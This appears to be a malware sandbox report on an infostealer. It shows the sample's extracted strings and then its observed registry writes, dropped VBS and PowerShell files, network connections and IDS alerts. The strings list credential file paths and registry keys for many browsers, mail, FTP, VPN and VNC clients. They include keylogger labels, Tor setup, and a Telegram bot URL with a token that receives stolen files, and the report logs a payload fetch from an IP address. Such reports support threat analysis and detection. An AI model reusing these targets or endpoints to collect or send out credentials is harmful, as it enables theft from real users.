\%insfolder%\
Software\Microsoft\Windows\CurrentVersion\Run
%insregname%
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run
True
%
GET
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
OK
http://EWEAQv.com
\msI
SELECT * FROM Win32_Processor
Name
MB
Unknown
CO
CO_
-
_
.zip
yyyy-MM-dd hh-mm-ss
Cookie
application/zip
SC
SC_
.jpeg
Screenshot
image/jpeg
/log.tmp
KL
KL_
.html
<html>
</html>
Log
text/html
[
]
Time:
MM/dd/yyyy HH:mm:ss
User Name:
Computer Name:
OSFullName:
CPU:
RAM:
IP Address:
New
Recovered!
User Name
:
OSFullName
uninstall
Software\Microsoft\Windows NT\CurrentVersion\Windows
Load
%ftphost%/
%ftpuser%
%ftppassword%
STOR
Length
Write
Close
GetBytes
Opera Browser
Opera Software\Opera Stable
Yandex Browser
Yandex\YandexBrowser\User Data
Iridium Browser
Iridium\User Data
Chromium
Chromium\User Data
7Star
7Star\7Star\User Data
Torch Browser
Torch\User Data
Cool Novo
MapleStudio\ChromePlus\User Data
Kometa
Kometa\User Data
Amigo
Amigo\User Data
Brave
BraveSoftware\Brave-Browser\User Data
CentBrowser
CentBrowser\User Data
Chedot
Chedot\User Data
Orbitum
Orbitum\User Data
Sputnik
Sputnik\Sputnik\User Data
Comodo Dragon
Comodo\Dragon\User Data
Vivaldi
Vivaldi\User Data
Citrio
CatalinaGroup\Citrio\User Data
360 Browser
360Chrome\Chrome\User Data
Uran
uCozMedia\Uran\User Data
Liebao Browser
liebao\User Data
Elements Browser
Elements Browser\User Data
Epic Privacy
Epic Privacy Browser\User Data
Coccoc
CocCoc\Browser\User Data
Sleipnir 6
Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
QIP Surf
QIP Surf\User Data
Coowon
Coowon\Coowon\User Data
APPDATA
\CoreFTP\sites.idx
HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\
Host
HKEY_CURRENT_USERSoftwareFTPWareCOREFTPSites
Port
User
PW
CoreFTP
webpanel
,
"
smtp
ftp
URL:
Username:
Password:
Application:
URL:
Username:
Password:
Application:
PW_
%mailaddres%
%password%
%smtp%
%toemail%
image/jpg
:Zone.Identifier
\tmpG
.tmp
%urlkey%
-f
\Data\Tor\torrc
p=
%PostURL%
127.0.0.1
POST
+
%2B
application/x-www-form-urlencoded
&
&amp;
<
&lt;
>
&gt;
&quot;
Copied Text:
<font color="#00b1ba"><b>[
</b>
<b>]</b> <font color="#000000">(
)</font></font>
False
<font color="#00ba66">{BACK}</font>
</font>
<font color="#00ba66">{ALT+TAB}</font>
<font color="#00ba66">{ALT+F4}</font>
<font color="#00ba66">{TAB}</font>
<font color="#00ba66">{ESC}</font>
<font color="#00ba66">{Win}</font>
<font color="#00ba66">{CAPSLOCK}</font>
<font color="#00ba66">&uarr;</font>
<font color="#00ba66">&darr;</font>
<font color="#00ba66">&larr;</font>
<font color="#00ba66">&rarr;</font>
<font color="#00ba66">{DEL}</font>
<font color="#00ba66">{END}</font>
<font color="#00ba66">{HOME}</font>
<font color="#00ba66">{Insert}</font>
<font color="#00ba66">{NumLock}</font>
<font color="#00ba66">{PageDown}</font>
<font color="#00ba66">{PageUp}</font>
<font color="#00ba66">{ENTER}</font>
<font color="#00ba66">{F1}</font>
<font color="#00ba66">{F2}</font>
<font color="#00ba66">{F3}</font>
<font color="#00ba66">{F4}</font>
<font color="#00ba66">{F5}</font>
<font color="#00ba66">{F6}</font>
<font color="#00ba66">{F7}</font>
<font color="#00ba66">{F8}</font>
<font color="#00ba66">{F9}</font>
<font color="#00ba66">{F10}</font>
<font color="#00ba66">{F11}</font>
<font color="#00ba66">{F12}</font>
control
<font color="#00ba66">{CTRL}</font>
Windows RDP
credential
policy
blob
rdg
chrome
{{{0}}}
CopyTo
ComputeHash
sha512
Copy
SystemDrive
\
WScript.Shell
RegRead
g
401
502
500
Add
chat_id
1972606022
caption
https://api.telegram.org/bot1977970812:AAHd8pA2REAwdAB_6eJ-9nZj90oz8OYGjrI/sendDocument
document
---------------------------
x
--
multipart/form-data; boundary=
Content-Disposition: form-data; name="{0}" {1}
Content-Disposition: form-data; name="{0}"; filename="{1}" Content-Type: {2}
--
Cookies
Opera
Chrome
\Google\Chrome\User Data
\360Chrome\Chrome\User Data
Yandex
SRWare Iron
Brave Browser
\Iridium\User Data
CoolNovo
Epic Privacy Browser
CocCoc
QQ Browser
Tencent\QQBrowser\User Data
UC Browser
UCBrowser\
uCozMedia
cookies.sqlite
Firefox
\Mozilla\Firefox\
IceCat
\Mozilla\icecat\
PaleMoon
\Moonchild Productions\Pale Moon\
SeaMonkey
\Mozilla\SeaMonkey\
Flock
\Flock\Browser\
K-Meleon
\K-Meleon\
Postbox
\Postbox\
Thunderbird
\Thunderbird\
IceDragon
\Comodo\IceDragon\
WaterFox
\Waterfox\
BlackHawk
\NETGATE Technologies\BlackHawk\
CyberFox
\8pecxstudios\Cyberfox\
Path=([A-z0-9\/\.\-]+)
profiles.ini
\Default\
Profile
origin_url
username_value
password_value
v10
v11
Opera Stable
\Local State
"encrypted_key":"(.*?)"
\Default\Login Data
\Login Data
\Google\Chrome\User Data\
logins
Major
Minor
2F1A6504-0641-44CF-8BB5-3612D865F2E5
Windows Secure Note
3CCD5499-87A8-4B10-A215-608888DD3B55
Windows Web Password Credential
154E23D0-C644-4E6F-8CE6-5069272F999F
Windows Credential Picker Protector
4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Web Credentials
77BC582B-F0A6-4E15-4E80-61736B6F3B29
Windows Credentials
E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Windows Domain Certificate Credential
3E0E35BE-1B77-43E7-B873-AED901B6275B
Windows Domain Password Credential
3C886FF3-2669-4AA2-A8FB-3F6759A77548
Windows Extended Credential
00000000-0000-0000-0000-000000000000
SchemaId
pResourceElement
pIdentityElement
pPackageSid
pAuthenticatorElement
IE/Edge
Type
Value
\Common Files\Apple\Apple Application Support\plutil.exe
\Apple Computer\Preferences\keychain.plist
*
Login Data
journal
wow_logins
\Microsoft\Edge\User Data
Edge Chromium
\Microsoft\Credentials\
\Microsoft\Protect\
GuidMasterKey
\Default\EncryptedStorage
\EncryptedStorage
entries
category
Password
str3
str2
blob0
PopPassword
SmtpPassword
Software\IncrediMail\Identities\
\Accounts_New
EmailAddress
SmtpServer
incredimail
HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine
current
Settings
SavePasswordText
ReturnAddress
Eudora
\falkon\profiles\
startProfile="([A-z0-9\/\.]+)"
\browsedata.db
autofill
Falkon Browser
startProfile=([A-z0-9\/\.]+)
Backend=([A-z0-9\/\.-]+)
\settings.ini
\Claws-mail
\clawsrc
passkey0
master_passphrase_salt=(.+)
master_passphrase_pbkdf2_rounds=(.+)
use_master_passphrase=(.+)
\accountrc
smtp_server
address
account
\passwordstorerc
{(.*),(.*)}(.*)
ClawsMail
TransformFinalBlock
Substring
IterationCount
signons3.txt
---
.
objects
Data
DecryptTripleDes
Flock Browser
ALLUSERSPROFILE
\\
DynDNS\Updater\config.dyndns
username=
=
password=
&H
t6KzXhCh
http://DynDns.com
DynDNS
\Psi\profiles
\Psi+\profiles
\accounts.xml
name
jid
password
Psi/Psi+
Software\OpenVPN-GUI\configs
Software\OpenVPN-GUI\configs\
username
auth-data
entropy
Open VPN
USERPROFILE
\OpenVPN\config\
remote
\FileZilla\recentservers.xml
<Server>
<Host>
</Host>
:
<Port>
</Port>
<User>
</User>
<Pass encoding="base64">
</Pass>
<Pass>
FileZilla
SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
HostName
UserName
PublicKeyFile
PortNumber
22
[PRIVATE KEY LOCATION: "{0}"]
WinSCP
Username
All Users
\FlashFXP\3quick.dat
IP=
port=
user=
pass=
created=
FlashFXP
\FTP Navigator\Ftplist.txt
Server
No Password
FTP Navigator
Programfiles(x86)
programfiles
\jDownloader\config\database.script
programfiles(x86)
INSERT INTO CONFIG VALUES('AccountController','
sq
.
t
xt
JDownloader
Software\Paltalk
HKEY_CURRENT_USER\Software\Paltalk\
pwd
Paltalk
\.purple\accounts.xml
<account>
<protocol>
</protocol>
<name>
</name>
<password>
</password>
Pidgin
\SmartFTP\Client 2.0\Favorites\Quick Connect\
\SmartFTP\Client 2.0\Favorites\Quick Connect\*.xml
<Password>
</Password>
<Name>
</Name>
SmartFTP
appdata
\Ipswitch\WS_FTP\Sites\ws_ftp.ini
HOST
UID
PWD
WS_FTP
PWD=
Key
Mode
IV
Padding
CreateDecryptor
\cftp\Ftplist.txt
;Server=
;Port=
;Password=
;User=
;Anonymous=
Name=
FTPCommander
\FTPGetter\servers.xml
<server>
<server_ip>
</server_ip>
<server_port>
</server_port>
<server_user_name>
</server_user_name>
<server_user_password>
</server_user_password>
FTPGetter
HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC
HKEY_CURRENT_USER\SOFTWARE\Vitalwerks\DUC
USERname
NO-IP
+-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
\The Bat!
\Account.CFN
zzz
TheBat
HKEY_CURRENT_USER\Software\RimArts\B2\Settings
DataDir
Folder.lst
\Mailbox.ini
Account
SMTPServer
MailAddress
PassWd
Becky!
\Trillian\users\global\accounts.dat
Accounts
Trillian
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Email
IMAP Password
POP3 Password
HTTP Password
SMTP Password
SMTP Server
Outlook
HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Executable
HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
FoxmailPath
\Storage\
\mail\
\VirtualStore\Program Files\Foxmail\mail\
\VirtualStore\Program Files (x86)\Foxmail\mail\
\Accounts\Account.rec0
\Account.stg
Read
Dispose
POP3Host
SMTPHost
IncomingServer
POP3Password
Foxmail
5A
71
\Opera Mail\Opera Mail\wand.dat
opera:
Opera Mail
abcçdefgğhıijklmnoöpqrsştuüvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
\Pocomail\accounts.ini
POPPass
SMTPPass
SMTP
PocoMail
RealVNC 4.x
SOFTWARE\Wow6432Node\RealVNC\WinVNC4
RealVNC 3.x
SOFTWARE\RealVNC\vncserver
SOFTWARE\RealVNC\WinVNC4
Software\ORL\WinVNC3
TightVNC
Software\TightVNC\Server
PasswordViewOnly
TightVNC ControlPassword
ControlPassword
TigerVNC
Software\TigerVNC\Server
Trim
UltraVNC
ProgramFiles(x86)
\uvnc bvba\UltraVNC\ultravnc.ini
passwd
passwd2
ProgramFiles
\UltraVNC\ultravnc.ini
\eM Client
.dll
eM Client\accounts.dat
eM Client
AccountConfiguration
72905C47-F4FD-4CF7-A489-4E8121A155BD
host
o6806642kbM7c5
\Mailbird\Store\Store.db
Server_Host
EncryptedPassword
Mailbird
SenderIdentities
NordVPN
NordVPN directory not found!
NordVpn.exe*
user.config
SelectSingleNode
//setting[@name='Username']/value
InnerText
//setting[@name='Password']/value
\MySQL\Workbench\workbench_user_data.dat


MySQL Workbench
%ProgramW6432%
Private Internet Access\data
\Private Internet Access\data
\account.json
.*"username":"(.*?)"
.*"password":"(.*?)"
Private Internet Access
<array>
<dict>
<string>
</string>
<data>
</data>
Safari Browser
-convert xml1 -s -o "
\fixed_keychain.xml"
A
10
B
11
C
12
D
13
E
14
F
15
ABCDEF
(
EndsWith
)
IndexOf
UNIQUE
table
Software\DownloadManager\Passwords\
EncPassword
Internet Download Manager
{0}
http://127.0.0.1:
HTTP/1.1
Hostname
200 Connection established Proxy-Agent: HToS5x
Connect
PathAndQuery
Fragment
Host:
Wr
W
ExtractFile
n
Tor
AUTHENTICATE "%torpass%"
SIGNAL NEWNYM
250
tor
StartInfo
FileName
\Tor\tor.exe
Arguments
UseShellExecute
RedirectStandardOutput
CreateNoWindow
Start
StandardOutput
ReadLine
Contains
Bootstrapped 100%
EndOfStream
Id
AvoidDiskWrites 1 Log notice stdout DormantCanceledByStartup 1 ControlPort 9051 CookieAuthentication 1 runasdaemon 1 ExtORPort auto hashedcontrolpassword %hash% DataDirectory %tordir%\Data\Tor GeoIPFile %tordir%\Data\Tor\geoip GeoIPv6File %tordir%\Data\Tor\geoip6
\tor.zip
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
%tordir%
%hash%
%torpass%
https://www.theonionrouter.com/dist.torproject.org/torbrowser/
<a.+?href\s*=\s*(["'])(?<href>.+?)\1[^>]*>
href
Replace
TrimStart
TrimEnd
tor-win32-
TransformBlock
Hash
16:
None
win32_processor
processorID
8f5410fc-22f7-4e67-b040-5d5d43d7d53a
Win32_NetworkAdapterConfiguration
IPEnabled
MacAddress
0d77f039-a07c-4875-857c-58b09177d41a
WinMgmts:
InstancesOf
Win32_BaseBoard
SerialNumber
8de92a18-36e4-45bc-b59b-fc323e880efa
x2
00061561
Berkelet DB
00000002
1.85 (Hash, version 2, native byte-order)
Unknow database format
SEQUENCE {
{0:X2}
INTEGER
OCTETSTRING
OBJECTIDENTIFIER
}
sha256
key4.db
metaData
id
item1
item2
nssPrivate
a11
a102
2a864886f70d0209
2a864886f70d010c050103
key3.db
global-salt
Version
password-check
logins.json
\"(hostname|encryptedPassword|encryptedUsername)":"(.*?)"
[^\u0020-\u007F]
signons.sqlite
moz_logins
hostname
encryptedUsername
encryptedPassword
Version=4.0.0.0
version=2.0.0.0
mscorlib
System
MailClient.Protocols.Smtp.SmtpAccountConfiguration
MailClient.Accounts.TlsType
MailClient.Accounts.CredentialsModelTypes
MailClient.Accounts.Mail.MailAccountConfiguration
MailClient.Accounts.ArchivingScope
MailClient.Mail.MailAddress
;
info
AccountConfiguration+accountName
AccountConfiguration+username
AccountConfiguration+password
providerName
Total events
11 870
Read events
10 914
Write events
698
Delete events
258

Modification events

(PID) Process:(1764) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(1764) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1041
Value:
On
(PID) Process:(1764) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1042
Value:
On
(PID) Process:(1764) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1046
Value:
On
(PID) Process:(1764) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1036
Value:
On
(PID) Process:(1764) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1031
Value:
On
(PID) Process:(1764) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1040
Value:
On
(PID) Process:(1764) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1049
Value:
On
(PID) Process:(1764) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:3082
Value:
On
(PID) Process:(1764) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1055
Value:
On
Executable files
0
Suspicious files
4
Text files
4
Unknown types
4

Dropped files

PID
Process
Filename
Type
1764WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRFC86.tmp.cvr
MD5:
SHA256:
2428EQNEDT32.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\taziokhg[1].vbstext
MD5:0C363E5F296423E6333EB683EED63733
SHA256:E41FEF1D2730393EA554509D2BB4FB66A104B2C41A559ADDA378061F4B7FE989
2428EQNEDT32.EXEC:\Users\admin\AppData\Roaming\zgsayyasu.vbstext
MD5:0C363E5F296423E6333EB683EED63733
SHA256:E41FEF1D2730393EA554509D2BB4FB66A104B2C41A559ADDA378061F4B7FE989
1764WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$65081cbc51c47f8ec97c98a8645ff0.rtfpgc
MD5:040894059C5613ADC73926CA900CFB11
SHA256:B4F45EB2EC5E3740FAC506DE42DB5E5B17EB79AB6816DD9167CD66495B9A26C4
2464powershell.exeC:\Users\admin\AppData\Local\Temp\p0cabimq.sxu.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2464powershell.exeC:\Users\admin\AppData\Local\Temp\sgniyma0.3fv.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2464powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivedbf
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
3
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2464
powershell.exe
GET
200
84.54.50.76:80
http://84.54.50.76/avgtpl.txt
US
text
288 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2428
EQNEDT32.EXE
142.250.185.170:443
firebasestorage.googleapis.com
GOOGLE
US
whitelisted
2068
RegSvcs.exe
149.154.167.220:443
api.telegram.org
Telegram Messenger Inc
GB
malicious
2464
powershell.exe
84.54.50.76:80
GLOBALCOMPASS
US
suspicious

DNS requests

Domain
IP
Reputation
firebasestorage.googleapis.com
  • 142.250.185.170
  • 142.250.185.202
  • 142.250.185.234
  • 142.250.186.138
  • 142.250.186.42
  • 142.250.181.234
  • 142.250.186.106
  • 172.217.16.138
  • 142.250.184.202
  • 142.250.186.74
  • 172.217.18.10
  • 142.250.186.170
  • 172.217.16.202
  • 142.250.184.234
  • 216.58.212.170
  • 142.250.74.202
whitelisted
api.telegram.org
  • 149.154.167.220
shared

Threats

PID
Process
Class
Message
2428
EQNEDT32.EXE
Unknown Traffic
ET JA3 Hash - [Abuse.ch] Possible Tofsee
2464
powershell.exe
Exploit Kit Activity Detected
ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1
Misc activity
ET HUNTING Telegram API Domain in DNS Lookup
2068
RegSvcs.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
2068
RegSvcs.exe
Misc activity
ET HUNTING Telegram API Certificate Observed
1 ETPRO signatures available at the full report
No debug info